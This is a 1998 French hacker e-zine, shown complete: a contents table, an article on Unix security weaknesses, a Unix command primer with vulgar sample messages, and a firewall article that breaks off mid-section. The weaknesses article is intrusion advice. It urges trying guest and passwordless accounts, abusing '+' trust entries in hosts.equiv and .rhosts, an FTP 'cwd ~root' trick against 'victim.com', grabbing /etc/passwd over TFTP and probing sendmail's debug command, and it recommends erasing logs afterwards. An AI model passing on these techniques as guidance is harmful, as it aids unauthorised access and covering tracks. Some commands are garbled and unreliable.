/----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ http://www.altern.org/hpclp/INDEX.HTML "The hacking is a great drug and the apprenticeship is the source." Introduction : -------------- Premiere parution de #h/p/c/l/p... Hacking/Phreaking/Cracking/Linux/Programmation, voila en gros ce que vous pouvez trouver sur ce mag. On peut aussi trouver des news, de la T T TTT TECHno, des trucs Coooooooooool et marrants. Bref ce new mag qui copie NoRoute, NoWay et le reste (arf, on rigole) et fait pour vous... Voici donc le debut d'une longue serie. En tout K on l'espere... Ce zine est votre zine, si vous trouvez des erreurs, si vous avez des suggestions, ou mieux, si vous avez des txt, n'hesitez po à nous mailler à : h_p_c_l_plemag@yahoo.com !!!! Tous sera lu et surement publie (sinon on vous expliquera), mais s'il vous plait faite votre file en format .txt!!! L'underground en a besoin. Disclaimer : ------------ Ce txt n'inssitent personne à faire des actes illegaux. Les auteurs ne sont po respondables des actes des autres. En clair pour tous ceux que la libertes d'expression & le droit à l'information genent : Go Get Fucked!!! Sommaire : ---------- _________________________________________________ name of the txt |auteur | ------------------------------------|------------| 1-: intro |la redac. | 2-: disclaimer |la redac. | 3-: Le systeme unix (part 1&2) |stealthyx | 4-: Les firewalls |trom | 5-: PGP |stealthyx | 6-: le hack des newbies |stealthyx | 7-: Comment hacker facilement les | | ftp, telnet, mail |Code-BAR | 8-: le SE |Tripbomb | 9-: hacking IRC |SoD | 10-:Revue de presse et des | | evenements. |stealthyx | 12-: les #, les bouquins | | & les sites interressants.... |la redac. | 13-:Annonce de la redac |la redac. | ____________________________________|____________| /----------\ /(__)____(__)\ |#h/p/c/l n°1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ UU UU NN NN ii XX XX UU UU NNN NN XX XX UU UU NN N NN ii XXXX UU UU NN N NN ii XXXX UU UU NN NNN ii XX XX UUUU NN NN ii XX XX 1 Bon, on va reprendre entierement le systeme... On abordera dans cette première partie que les faille du systeme UNiX. On vera comment hacker ce systeme dans une deuxime partie. C pour ca que ca risque d'être long... A noter que je tiens c informations d'un bouquin sur la securite : "securite reseaux", j'en remercie l'auteur:)). -------------------------| I-:presentation d'UNiX : | -------------------------| UNiX est un systeme qui a ete cree en 1972. C un extraordinaire OS qui depuis la date de ca creation reste inegale en matiere de portabilite et d'interoperabilite. Le reseau internet est presque entierement constitue de machine UNiX. D'ou l'importance de cet OS. Mais en fait cet Os a une grande faiblesse : la securite... ;))) Meme si de part son architecture, il offre une + grande securite que ms-dos. Je v presenter dans le tableau si dessus les differences importantes entre ms-dos et UNiX : __________________________________________________________________________ |____________________________________|___________________________________| | | | | UNiX | Ms-dos | |____________________________________|___________________________________| | | | |UNiX est multi-utilisateur. C à dire|Ms-dos n'a pas ce concepte multi- | |que sa securite est base sur un sys-|utilisateur. C à dire que une fois | |teme de privileges. Les utilisateur |connecte à une machine dos tous | |d'UNiX ont chacun un passwd & ont |vous est permis... | |chacun des autorisations + ou - | | |grande en ce qui concerne le reseau.| | |L'utilisateur le + interessant est | | |le root. | | |____________________________________|___________________________________| | | | |Sous UNiX les programmes ne peuvent |Sous Ms-dos le programme peut | |pas ecrire sous n'importe quelle |ecrire n'importe meme là ou se | |du HD... |trouve le systeme d'explotation... | |____________________________________|___________________________________| | | | |UNiX ne permet à aucun programme de |Cela est possible sous Ms-Dos | |de modifier un file. | | |____________________________________|___________________________________| -------------------------------------------------------------------------- Voila a peut près les differences entre UNiX et Ms-Dos. Meme si, on le voit dans ce tableau, UNiX est + securise que le Dos, il n'a pas ete concu pour offrir un maximum de securite. On peut biensur rendre UNiX + sur mais il n'est pas configure en tant que tel dans sa version par default ;))))) . Si l'on configure UNiX pour qu'il soit + securise alor il faudra faire ca en trois parties : -la securites des comptes -la securites des connexions exterieurs -la securites des fichiers et des repertoires --------------------------------------------------| II-Les bugs et les erreurs d'utilisation d'UNiX : | --------------------------------------------------| I-La securite des comptes : ---------------------------- 1.Les passwd : --------------- La securite des comptes sont surtout du aux passwords. Pour un utilisateur UNiX, il faut choisir un passwd qui ne puisse etre devine. Par exemple pour l'utilisateur root, son passwd ne sera pas "root". C une question pri- maire, mais que beaucoup d'utilisateur oublie... :))))))))))) Mais ne comptez pas sur cette faille, pour hacker une machine sous UNiX. Seul les utilisateur qui ne sont pas expert en informatique ne prennent pas guarde à leur passwd & par consequent c utilisateurs ne sont pas très important dans la pyramide des privileges... Toute fois vous pouvez essailler cette faille pour des reseaus tout nouveau qui n'ont pas encore ete configures... La + part des reseau UNiX obligent leur utilisateur à changer regulièrement leur passwd :(((, mais on vera ca dans la seconde partie. 2.Les comptes obsoletes : ------------------------- Il arrive que l'on puisse trouver des comptes obsoletes qui n'ont pas encore ete anulé (mort de l'utilisateur, ou depart en vacance). L'administrateur reseau peut donc annuler ces comptes en mettant une date d'expiration des comptes. La encore on peut prendre la place de account :))). 3.Les comptes des visiteurs : ----------------------------- C un cauchemar pour la securite :))). les comptes visiteurs sont les premiers a essailler dans un systeme UNiX recent qui n'a donc pas pu etre configure... ;)))))))))))))) 4.Les comptes sans passwd : --------------------------- C fou, non ??? & pourtant ca existe !!! 5.Les groupes et les comptes de groupes : ----------------------------------------- Pour enregistrer des groupes il y a deux maniere de le faire : a:laissez les utilisateur du groupes connectes avec le meme passwd et le meme nom d'utilisateur. ;))) b:editer le fichier de group /etc/group, creer le groupe et d'y associer la liste des utilisateur... Le format du fichier est : nom du groupe:passwd:numero d'identification:utilisateur1,utilisateur2 .... 6.Le systeme NIS : ------------------ Le systeme NIS est un moyen très pratique de partager, entre plusieur machines un seul fichier passwd et un seul fichier group ;))). Par exemple si on veut changer un passwd sur un reseau, il faut le faire sur toute les machine, lorsqu'il n'y a pas NIS. Sur les grand reseaux de 1000 becanes, c assez dur.... Voila pourkoi on a fait NIS. NIS fonctionne ainsi : sur la machine cliente, le fichier passwd contient une entré libellee +::0.0:: . Lorsque l'utilisateur ce connecte sur une machi- ne client, NIS demande le login et le passwd. Au signe + près, l'entre passwd est exactement la meme que celle d'un compte root sans nom d'utilisateur ni passwd. :))) On vera en detail le systeme NIS dans une autre partie... II-Securites des connexionx exterieures : ----------------------------------------- Voila, on va attaquer des choses un peu plus interressantes :))). 1.Les machines equivalentes : ----------------------------- Le mecanisme des machines equivalentes (trusted host) permet de specifier une liste de machines ou un utilisateur ayant le meme nick sur les deux machines peut etablir une session ou executer une commande à distance sur une machine cible sans passwd. Le fichier /etc/hosts.equiv contient la listes des machines equivalentes. Les utilisateur qui ouvrent une session pas la commande rlogin ou excutent une commande par rsh n'ont pas a fournir de passwd ;))) s'il viennent d'une machine listee dans ce fichier (spoof, spoof, spoof :))). Certaines version de UNiX sont livrees avec une seule entree dans le fichier host.equiv : un "+". Si c le cas sur la machine convoitee et libre acce pour tout le monde car le "+" signifie que toutes les machines sont classees comme equivalentes ;)))))))). Les fichier .rhost permet à des utilisateur specifiques d'acceder a des becanes specifiques sans passwd. Tout utilisateur peut creer un fichier .rhostdans son repertoire de connexion et autoriser l'acce a son compte sans passwd. Tout utilisateur peut donner un acces sans passwd à n'importe qui !!! :)))) 2.Les terminaux securises : --------------------------- Selon les versions d'UNiX, le fichier qui definie les terminaux securises est soit : /etc/ttyab, soit : /etc/ttys. Pour autoriser le super utilisateur a se connecter à partir d'un terminal donne, faut ajouter dans le fichier le mot cle "secure" a la fin de la ligne d'identification du terminal. Si "secure" n'est pas mis a la fin de ligne d'identification du terminal, un utilisateur etant super utilisateur peut se connecter sur un compte ordinaire et ensuite devenir super utilisateur avec la commande "su" :))). 3.NFS : ------- NFS (Network File System) est un protocole qui permet à plusieur machines de partager des fichiers. Il est très utile pour permettre aux stations sans HD de stosker leur fichier dans une autre machine + centralisee. Le fichier /etc/exports contient la liste des fichiers que les autres machines ont le droit de monter sur le reseau. Voici les differrents droit de ces machine : root=machines (machines etant la description des machines) : lorque l'ontvois ca, c que les machines sitees ont le droit root (ou super utilisateur). access=machines : la ce sont seulement les machines autorisees a monter des repertoires... lorqu'il n'y a pas d'option access, toutes les machines sont autorises à mon- ter le repertoire. /etc/exports est presente comme suit en presence de l'option access : /usr access=machine1:machine2:machine3... ou bien /usr root=machine1:machine2:machine3... De plus si l'adminitrateur lors de l'edition du fichier a oublier de taper la commande : # exportfs -a, le systeme ne relira pas forcement le fichier :))). 4.FTP (file transfert protocole): --------------------------------- Bon. Je pense que vous connaissez. A partir de FTP on peut facilement<<<< open victim.com Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restrictions apply. 5.TFTP : -------- Le petit frère de FTP!!! Son port est le 69a TFTP peut presentez des brèches assez grandes pour faire passer un TGV... :)) essayer donc la sequence de commandes suivantes : evil %tftp tftp>connect la_machine tftp>get /etc/passwd tftp>quit 6.Sendmail : ------------ Sendmail a aussi un gros bug de securite, meme si on a refait des versions + securise, parfois les entreprises mettent du temps a changer leur version. Connectez vous au sendmail par telnet (port 25=smtp) et tapez debug... Si la reponse n'est pas "unrecognised command", c que la version du sendmail est encore buge et que vous pouvez en profiter 7.Finger : ---------- le finger permet a un utilisateur distant de voir le nom complet d'un utilisateur, son repertoire de connexion, la date de sa derniere connexion, et la date ou il a lu son courrier pour la derniere fois... III.Securite des fichiers et des repertoires : ----------------------------------------------- 1.Les bits de droit d'accès : ----------------------------- Tous les fichiers et repertoires UNiX ont trois ensemble de bits de droit d' acces associes. Le prmier ensemble definit quels sont les droits du proprio du fichier, le second definit quels sont les droits du groupes proprio du file & le dernier quels sont les droits d'acces aux autres utilisateurs ;)). Voici à quoi correspondent les bits des droits d'acces : *droit d'acces en lecture (read). *droit d'acces en ecriture (write). *droit d'execution (execute). *setuid : lorceque ce bit est positionne sur un fichier, cela signifie que le fichier est execute avec le droit du proprietaire du fichier. *setgid : lorceque ce bit est positionne sur un fichier, cela signifie que le fichier est execute avec le droit du groupe proprietaire du fichier. Si il n'y a aucun bits associe aux fichiers, tout le monde peut tout faire avec. ;] 2.Crypt : --------- Crypt est un moyen de chiffrer les fichiers sous UNiX. Des cracker les dechiffrent assez vites. On les trouves un peu partout sur le net..... 3.Les peripheriques de /DEV : ----------------------------- UNiX accede aux disques et à la memoire par l'intermedeiaire des fichiers (dit speciaux)du repertoire /dev mais aussi aux machines du style imprimante... Essaillez donc d'avoir acces a ce genre de fichier, cela peut etre assez amusant de leur imprimer certaine chose (hihi). Le + souvent seul le root à acces à ces fichiers. -----------------------------------| III-: la surveillance du systeme : | -----------------------------------| Une fois parti de la machine que vous avez hacker croyez ne pas avoir laissez de trace ???? Vraiment ???? :))) Je vous demontre le contraire!!!! I-surveillance des comptes : ---------------------------- 1.le fichier /usr/adm/lastlog : ------------------------------- Ce fichier est une trace de la date de la derniere session etablie par chaque utilisateur. Profitez en pour savoir quand se connecte l'utilisateur que vous avez hacker... Ca pourra vous servir si vous comptez revenir. Je ne vous le conseille toute fois pas. 2.le fichier /etc/utmp : ------------------------ Le fichier /etc/utmp enregistre qui est connecte sur le moment sur le systeme. On peut le visualiser avec la commande who. Soyez donc discret & evitez de faire des choses qui allerterait tout le monde (surtout tard le soir & meme en root). 3.le fichier /usr/adm/wtmp : ---------------------------- Ce file enregistre les debuts et les fins de sessions de tous les utilisateurs. On peut executer la commande who sur ce fichier : who /usr/adm/wtmp Pour isoler ce qui vous interresse tapez : last /usr/adm/wtmp username ou bien : last /usr/adm/wtmp terminal 4.le fichier /var/adm/acct : ---------------------------- Ce file enregistre toutes les commandes executes et le user qui les a executes. Pour avoir acces à ce fichier tapez : latscomm /var/adm/acct username ou bien : latscomm /var/adm/acct terminal II-Surveillance des connexions reseau : --------------------------------------- 1.La commande syslog : ---------------------- Avec syslog, on peut forcer n'importe quelle commandes à envoyer des informations, ainsi que les messages d'erreurs, vers un fichier traces tel que /usr/adm/messages. Si vous arrivez à vous connecter sur le reseau, en pleine journee vous pouvez vous contenter d'effacez si vous le pouvez les traces d'erreurs que vous avez pu commetre, mais il est preferable d'effacer toutes les traces que vous avez laissez sur ce fichier et sur les autres de jour ou de nuit. 2.La commande showmount : ------------------------- Elle permet de voir toute les machines qui ont monte quelque chose à partir d'un serveur NFS. Sans option elle donne simplement la liste des machines. Avec l'option -a elle vous donne la liste des machines & des repertoires montes. Avec l'option -d elle affiche les repertoires montes par une machine donne. En clair si vous passez par un serveur NFS evitez de toucher aux fichiers. Y'a une trace de vos pas ... :((( III.Surveillance de la securite des fichiers : ---------------------------------------------- 1.la commande find : -------------------- Voici un txt qui vient tout droit d'un bouquin sur la securite des reseaux. "La commande find sert à rechercher des fichiers dans une arborescence selon des critères tels que le nom, le type, les droits d'acces, le proprietaire, les dates de modifications, etc. Elle retourne une liste de fichier qui satisfont aux criteres , et on peu envoyer cette liste sur une imprimante ou bien la passer à d'autres commandes UNiX. La syntaxe de find est la suivante : % find repertoire criteres Pour trouver tous les fichier normaux (de type f) à partir du repertoire racine (/), tapez : find / -type f Pour afficher cette liste tapez : find / -type f -print Pour trouver des fichiers normaux (de type f) et setuid (c'est à dire dont le ET logique entre les bits de droit d'acces et 4000 vaut 1), il faut utili ser le parametre -a (and) et un syntaxe de ce type : find / (-type f) -a ( -perm -4000) -print Pour trouver les fichiers normaux et setuid (4000) ou setgid (2000), tapez : find / (-type f) -a ( -perm -4000 -o -perm 2000) -print Vous pouvez ensuite envoyer les résultats de cette recherche à l'imprimante. Si vous avez de gros diques, vous pouvez aller dejeuner en attendant les resultats. Pourquoi effectuer cette recherche ? Parce que des hackers, quand ils ont reussi à penetrer dans un systeme, adorent laisser derrière eux des programmes qui leur donnent des droits qu'ils ne devraient pas avoir. Si la commande find vous permet de trouver de tels programme etudiez les attentivement et voyer pourquoi ils ont de tels droit d'acces. Ensuite, vous pourrez decider soit de detruire le fichier, soit de modifier les droits d'acces, soit encore d'entreprendre un autre type d'action. Les programmes setuid et setgid se trouvent normalement dans /bin/etc, /usr/bin, /usr/ucb et /usr/etc. des programmes de ce types situes ailleurs, et particulierement dans la racine, peuvent etre la cause de problemes. Si votre systeme est un UNiX de Sun, vous pouvez egalement supprimer le bit setuid de /usr/etc/restore, car il s'agit d'une breche de securite interressante pour un hacker. Utilisez la commande chmod pour cela." Bon, vous savez maintenant qu'il ne faut pas sous estimer les possibilites des administrateur reseau. Je vous conseille personnellent de ne pas laisser de fichier comme des chevaux de troie, cela ne vous sert à rien puisque il est preferable de ne pas revenir sur les becanes que vous avez hacke et puisque l'administarteur reseau peut très bien retrouver votre prog. :((( Mais comme y'en à peu qui font bien leur boulot, vous pouvez toujour tenter le coups !!!! :))))))))))) -------------------------------------------- IV-: Bonus : liste des ports (non exaustif)| -------------------------------------------- discard 9 netstat 15 chargen 19 ftp 21 telnetd 23 smtp 25 rlp 39 bootp 67 fingerk 79 http 80 / 8080 military http 80 / 8080 / 5580 link 87 pop3 110 identd 113 nntp 119 newsk 144 execk 512 login 513 pkill 515 ktalk 517 ntalk 518 netwall 533 rmontior 560 montior 561 kerberos 750 ---------------------------------------------------------------------------- ii uu uu nn nnn x x uu uu nn n n ii xx uuu uu nnn n ii xx uu uu uuuu nn n ii ii i x x uu uu uu nn n ii i x x 2 Generalite sur le systeme UNiX... INTRO: ------ Ce txt est inspire de nombreux documents en anglais, que l'on peut trouver sur le net & aussi de nombreux bouquins sur UNiX... Je remercie par avance tout les auteurs qui ont contribue a mon apprentissage. La liste serais trop grande pour etre sitee ici mais je peu en gros vous siter : Sir Hackalot, Red Knight, Deicide ,Dan Farmer & Wietse Venema. Et beaucoup d'autre... OUAAAA, me revoila !!!! Bon on y go sinon on finira jamais.... Attention !!! Je vous recommande fortement d'acheter un bouquin sur le systeme UNiX. Cette article, comme le precedant n'est pas exostif. ------------- I-Le kernel | ------------- C le coeur d'une machine roulant sous UNiX. Il s'occuppe des fichiers system, de l'usage de la memoire, & des procedes software et hardware. Il ------------- II-Le shell | ------------- Le shell est un programme .exe qui se lance quand un utilisateur se log sur la machine. Le shell peut etre n'importe lequel programme executable et il est defini dans le passwd file. Le shell que l' on utilise le plus souvent est un "traducteur de commande". Un peu comme le command.com de ms-dos. --------------------------- III-Le systeme de fichiers| --------------------------- Je v vous faire un petit shema avant de continuer : |--/unix | |--/etc|--/passwd | |--/bin | |--/group | |--/profile | |--/utmp Systeme| |--/conf UNiX --| |--/motd en | etc... general| |--/dev |--/duke3d | | |--/tmp |--/jeu|--/command&conquer | | |--/lib |--/annuaire | | |--/usr|--/X|--/mail | | | | | |--/bin |--/celullaire | | | | | | |--/travail|--/plan-telephonique | | | | | |--/Y|--/travail | | | | | |--/mail | | | |-etc.... | |--/bin | --/root ou / Voila je vous ai presente en gros le panorama (tres minimaliste, mais c l' essentiel) d'un root dans un systeme UNiX. C un "directory" ou repertoire root Maintenant on va voir ce que represente ces fichiers... /unix : c la ou se trouve le kernel. Un peu le c:\windows sous un pc sous winmerde. /etc : le fichier qui nous interressera beaucoup... Il contient tout les fichier qui interressent l'administrateur reseau, /passwd, /group... /dev : il contient tous les fichiers concernant l'utilisation de machines exterieur du type imprimante... /tmp : temporary files /lib : repertoire qui contient des programmes d'un haut niveau de language. /usr : je crois que d'apres le shema vous pouvez comprendre... /bin : contient des programmes executable. En fin le /root ou / contient : /install : à votre avie ??? /save : " " " """ /mnt :-----------| /bck : |- ??? (ca serait bien que ceux qui connaisse l'utilites de ces /lost+found -----| fichiers me mail. merci) voila en gros le systeme de fichier qui tourne sous un UNiX. N'oubliez pas que je n'ai pas l'intention de faire un file exaustif, c seullement pour eclairer votre root (hahahaha). ---------------------- IV-Les commandes UNiX| ---------------------- Nous ne verons pas toutes les commandes ici... ls= ------ il vous permet d'avoir des renseignement sur un repertoire, ce qu'il contient, etc... ex: $ ls /usr/x //ici on demande des infos sur le file usr/x jeu annuaire mail bin travail ls-l= ------- elle vous permet d'avoir de plus ample information sur les file d'un repertoire. ex: $ ls-l /usr/x d rwxr-x--- x #h/p/c/l/p 10450 05/09/98 2:09 jeu d rwxr----- x #h/p/c/l/p 9020 29/08/98 8:12 annuaire d rwx------ x #h/p/c/l/p 10030 05/09/98 14:15 mail d rwxr-x--- x #h/p/c/l/p 20012 05/09/98 11:48 bin d rwxr-x--- x #h/p/c/l/p 15421 05/09/98 12:09 travail 1 2 3 4 5 6 7 8 1 : le type de fichier : il en existe trois : -les repertoires -les fichiers ordinaires (textes, courriers, source de programmes,.exe,etc.) -les fichiers speciaux (pour la gestion du systeme, donc interressant) 2 : le bit de droit d'acces Comme je vous l'ai dit dans mon dernier article il exite des bit de droit d'acces, dont voici un exemplaire. Il se divise donc en trois parties de trois caractere (il y a 9 caracteres). La premier partie concerne le propio du file (u) La deuxieme partie concerne le groupe du proprio (g)(avec lequel il travail) La troisieme concerne un utilisateur externe au groupe.(o) Dans les trois cas il existe trois droit d'acces qui sont designe par trois lettre respective : r : droit de lecture (Read) w : droit d'ecriture (Writte) x : droit d'execution (eXecute) le - indique qu'il n'y a aucun droit accorde 3 : le proprio du file 4 : le groupe auquel le proprio appartient ou travaille 5 : memoire en ko 6 : la date de la derniere lecture 7 : l'heure de la derniere lecture 8 : le nom du fichier Dans notre exemple : -le proprio a le droit de lecture, ecriture, execution sur tout les fichier de son repertoire. -le groupe du proprio a le droit de lecture & execution sur les fichiers /jeu, /bin & /travail ; il a le droit de lecture sur le fichier /annuaire. -les autres users n'ont aucun droit. cat= ------ Cette commande vous permet de lire un fichier sur l'ecran (des fichier txt naturellement), si vous en avez la permition. ex: $ cat /usr/x/mail/y-à-x/lettre112014.txt line one x line two t qu'un pauv con line three vivement qu'on te vire... line four y. cd= ----- Cette commande permet de changer de repertoire. ex: $ cd /user //on est a present dans le repertoire /usr, on etait //dans le repertoire /root ou / $ ls //comme on se trouve dans le repertoire /usr on a po //besoin de mettre ls /usr. x y mike loulou kiki etc... cp= ----- Avec ca on peut copier un fichier. $ cd [fichier a copier] [destination] ex: $ cd / $ ls unix etc dev tmp lib usr bin $ cp usr usr2 $ ls unix etc dev tmp lib usr bin usr2 //ah bon ???? plus de memoire ??? merde !!! [panique] mv= ----- Pour changer les noms des files : $ mv [ancien nom] [nouveau nom] ex: $ mv usr2 a-effacer $ ls unix etc dev tmp lib usr bin a-effacer pwd= ------ Pour savoir dans quel repertoire on est : ex: $ pwd / $ cd /a-effacer $ pwd /a-effacer $ ls x y mike loulou kiki etc... $ cd .. //les 2 . renvois au dernier repertoire visite $ pwd / $ cd $home //$home renvoie au repertoire de l'utilisateur $pwd / //je suis root rm= ----- pour supprimer un fichier : $ rm [fichier a supprimer] ou rm-r [repertoire a supprimer] ex: $ rm /usr/x/mail/y-à-x/lettre112014.txt $ ls /usr/x/mail/y-à-x lettre1.txt lettre2.txt lettre3.txt : : : lettre112013.txt $ rm-r /a-effacer $ ls unix etc dev tmp lib usr bin write= -------- l'une des commandes les plus cooool : le chat. write [nom de l'utilisateur] ex: $ write y y has been notified Ho! salope ou t'es ??? Message from y on tty12014 at 15:17 qu'est ce tu veux connard ?? Pourkoi tu m'a insulte comme ca dans ton mail ??? Message from y on tty12014 at 15:17 parecque t qu'un enfoire qui ma rendu cocu! salaud toi t qu'une pute qui se vent alor ferme la $ control-D //pour ce barrer parceque sinon on a po fini :)) who= ------ Pour savoir qui est connecte : ex: $ who login term logontime y + tty12014 08:00 mike + tty12014 02:31 loulou + tty12014 10:09 kiki - tty12400 06:56 Le + indique qu'on peut chater avec le mec le - indique le contraire sz= --- envoyer via un zmodem ex : $ sz [+nom fichier] ready to send rz= --- recevoir via un zmodem ex : $ rz [+nom fichier] rx-sx= ------- Pareil sauf que c pour les xmodem ed = ------ Un editeur de texte. Voici c differentes fonctions non exostives : * a ou a = averti la machine que vous allez ecrire. * l [+nomfichier] ou l [+nomfichier] = load un fichier * s [+nomfichier] ou s [+nomfichier] = sauve le fichier *q ou q = quitter l'editeur ex : $ ed Pour Y 0 // ligne zero * a // pour commencer a ecrire Ma chere petite conne : Sache que je t'emmerde! * 1 Ma chere petite conne : * a Pour finir je veux te dire un truc : tu prendra pas la place du patron en le sucant! [controll-z] *0a //ajoute quelque chose apres la ligne zero Objet : pour mieux t'enculer. * w 63 * a En plus je suis pas radains g gaspille 42 bytes pour t'ecrire se message. * w 74 * q (aujourd'hui, il existe un editeur oriente ecran, non pas ligne comme ed et ex(un autre editeur). chmod = -------- Permet de changer les droits d'acces. Il ne peut etre utilise que par le proprio du fichier concerne. ex: $ ls-l /etc -rwx------ root #h/p/c/l/p 10450 05/09/98 2:09 bin -rwx------ root #h/p/c/l/p 90203 29/08/98 8:12 passwd -rwx------ root #h/p/c/l/p 10030 05/09/98 14:15 group -rwx------ root #h/p/c/l/p 20012 05/09/98 11:48 profile -rwx------ root #h/p/c/l/p 15421 05/09/98 12:09 utmp -rwx------ root #h/p/c/l/p 10014 05/10/99 11:02 conf -rwx------ root #h/p/c/l/p 12240 05/12/01 12:02 motd $ schmod o+w,o+r,o+x passwd //ici on met les droits rwx aux exterieurs $ls-l /etc/passwd -rwx---rwx root #h/p/c/l/p 90203 29/08/98 8:12 passwd//cool ! $ schmod u-w,u-r,u-x passwd -------rwx root #h/p/c/l/p 90203 29/08/98 8:12 passwd//arf! on peut utiliser cette commande autrement : |proprio |groupe |autre utilisateur (externe)| |r;w;x |rwx |rwx | |400;200;600 |40;20;10|4;2;1 | ex : $ ls-l /etc -rwx------ root #h/p/c/l/p 10450 05/09/98 2:09 bin -------rwx root #h/p/c/l/p 90203 29/08/98 8:12 passwd -rwx------ root #h/p/c/l/p 10030 05/09/98 14:15 group -rwx------ root #h/p/c/l/p 20012 05/09/98 11:48 profile -rwx------ root #h/p/c/l/p 15421 05/09/98 12:09 utmp -rwx------ root #h/p/c/l/p 10014 05/10/99 11:02 conf -rwx------ root #h/p/c/l/p 12240 05/12/01 12:02 motd $ schmod 700 passwd //400+200+100=700 $ls-l /etc/passwd -rwx------ root #h/p/c/l/p 90203 29/08/98 8:12 passwd $ schmod 777 passwd //400+200+100+40+20+10+4+2+1=777 $ ls-l -rwxrwxrwx root #h/p/c/l/p 90203 29/08/98 8:12 passwd $ schmod 444 passwd $ ls-l -r--r--r-- root #h/p/c/l/p 90203 29/08/98 8:12 passwd ... chown & chgrp = --------------- La commande chown permet de changer le proprietaire, la commande chgrp parmet de changer le groupe. ex: $ schown stealthyx /etc $ ls-l / drwxrwxrwx stealthyx #h/p/c/l/p 11201254 21/09/98 9:30 etc ..... $ schgrp system /etc $ ls-l / drwxrwxrwx stealthyx system 11201254 21/09/98 9:30 etc ... ---------------------------------- V-: quelques caracteres speciaux | ---------------------------------- Control-D : Cette commande permet de stope l'application que vous utilisez, le mail, l'editeur, etc. Quand vous etes sur le shell le fait d'appuyer sur ces deux touches vous deconnecte. Control-J: Sur certain systeme UNiX cette combinaisons de touche <==> "enter" ? : ex : /cat?sol UNiX va chercher tout les "mots" commencant par cat et finissant par sol. Le ? signifie qu'il pourra mettre entre le debut et la fin du mot des lettres entre a et z et de nombres entre 0 et 9. * : ex : /cat* Le systeme va chercher tout les mots commencant par cat : cat, cattttt, catretr, catffff, etc. ex : /cat*hhh La il va chercher tout les mots commencant par cat et finissant par hhh : catthsjdhhh, catdfggdsjhhh, catburgerhhh, etc. [] - ex : /cat[c,v,f]hhh Unix vas trouver donc : catchhh, catvhhh et catfhhh ex : /cat[a-z][A-Z][0-9999]hhh bon je vais pas mettre tous ce que UNiX va chercher (faut po rever!!!). bon pour le reste je vous le laisse en anglais : > - le caractere special > permet de creer ou d'ecraser un fichier deja existanr : $ ls usr/y mail travail $ ls > travail // la le fichier sera ecrase $ ls usr/y mail travail $ ls > jeu // ici le fichier sera creer jeu mail travail >> - pour rajouter la date ou le chemin d'acce dans la liste d'un repertoire sans ecrase le fichier qui suit le carcatere special >>. Si le nom qui suit >> n'est pas un fichier, alor ce fichier est cree | - pipeline : $ ls /usr | wc-l //dit combien de fichier ou reêrtoire il ya a. 2 $ ls /usr x y Y'en a plein d'autre mais je v po tous vous les donner. A vous de chercher. ------------- EEENNNDDD | ------------- Voila c a peu pres (tres a peu pres) tout ce que dont a besoin de connaitre lorsqu'on hack une machine (ormis la programmation du shell, que j'essairai d'expliquer dans une prochaine partie) @+++++ ---------------------------------------------------------------------------- stealthyx@yahoo.com pour toutes remarques à propos de cet art. ---------------------------------------------------------------------------- /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ . . /|\ LES FIREWALLS PAR TROM /|\ / | \ / | \ \ | / Kortex agency 1998 \ | / Cette documentation est à but purement éducatif , je ne pourrais pas être tenu responsable de son utilisation . De plus si vous avez des remarques à me faire , elles seront les biens venues ! J'invite tous les experts de sécurité à me contacter . En effet j'aurais quelques questions à poser , quelques théories à vérifier et quelques files à demander . Sur ceux je vous laisse à mon aide en espérant qu'elle étanchera un peu votre soif de savoir ! -------------------- I Présentation . . | -------------------- 1/Objectf du firewall . ----------------------- Les firewalls ont obtenu une grande renommée en matière de sécurité sur Internet . Ils ont deux objectifs : Þ Protéger le réseau interne contre les tentatives d'intrusion provenant de l'extérieur . Þ Limiter et vérifier les connexions provenant du réseau interne vers extérieur . 2/Fonctionnement du Firewall . ------------------------------ Le principe du firewall est relativement simple . A l'origine un firewall est un système comportant deux interfaces réseau . (Je vous passe l'explication bidon du mot qui en fait nous vient de l'automobile) _________________________ | | | | ____________________ | | _________________ |reseau interne | | | | | |que l'on souhaite | | Internet |-----| Firewall |-------|proteger contre | | | |_______________| |les mechants | | | |__________________| |_______________________| Remarque : Il se peut que l'isolement de la totalité du réseau ne soit pas nécessaire . A ce moment le réseau à sécurisé est relie au sous réseau par un FW et le sous réseau est relié à Internet par un routeur . Dans ce cas la topologie ressemblerait plus à ça : _________________ _____________ ____________________ | | |reseau ou | |reseau interne | | | _________ |il ya les | |que l'on souhaite | | | | | |ordis des | __________ |proteger contre | | Internet |--|routeur|--|secretaires| | |-|les mechants | | | |_______| |___________|--|firewall| |__________________| | | |________| |_______________| Pour la suite on prendra le premier cas , celui ou l'on souhaite protéger tout le réseau local . On a en fait une interface interne reliée au réseau local et une interface externe reliée à Internet . L'ordinateur firewall peut atteindre à la fois le réseau protégé et Internet . Le réseau protège ne peut atteindre Internet et Internet ne peut toucher le réseau protège . 3/Principale différence entre un FW et un routeur IP . ------------------------------------------------------ Le routeur prend en charge les paquets jusqu'à la couche IP. Le routeur transmet chaque paquet en fonction de l'adresse de destination du paquet et de la route vers la destination précisée dans la table de routage . Par contre le firewall ne transmet pas les paquets . Le pare feu accepte les paquets et les prend en charge jusqu'à la couche application . -------------------------- II Les différents types .| -------------------------- 1/Filtres de paquet . --------------------- Un firewall de ce type inspecte tous les paquets qu'il recoie et regarde s'ils correspondent aux règles préalablement établis. S'il respecte les règles il est accepté sinon il est rejeté . Les critères des règles peuvent être par exemple l'adresse IP , les ports sources et destination contenu dans les paquets . 2/ Les Proxy . -------------- Lorsqu'un firewall de type proxy est utilisé sur un réseau , il n'y a aucune connexion directe entre les systèmes du réseau local et le réseau Internet . Les machines internes se connectent en fait au firewall pour lui demander un service . Après le FW se charge de relayer la requête au serveur Internet puis de renvoyer la réponse au client interne 3/Les hybrides . ---------------- La je peux pas dire grand chose dessus . ----------------------- III Filtre de paquet .| ----------------------- ÞLa technologie de filtre de paquets est incluse dans le noyau de Linux . Le filtre doit agir dans la pile IP du système . Pour utiliser cette technique vous allez devoir une fois de plus recompiler le noyau (Youpi vous allez bien vous marrez ) et répondre YES aux questions suivantes : IP : forwarding/gatewaying (CONFIG_IP_FORWARD) YES IP : firewalling (CONFIG_IP_FIREWALL) YES IP : firewall packet logging 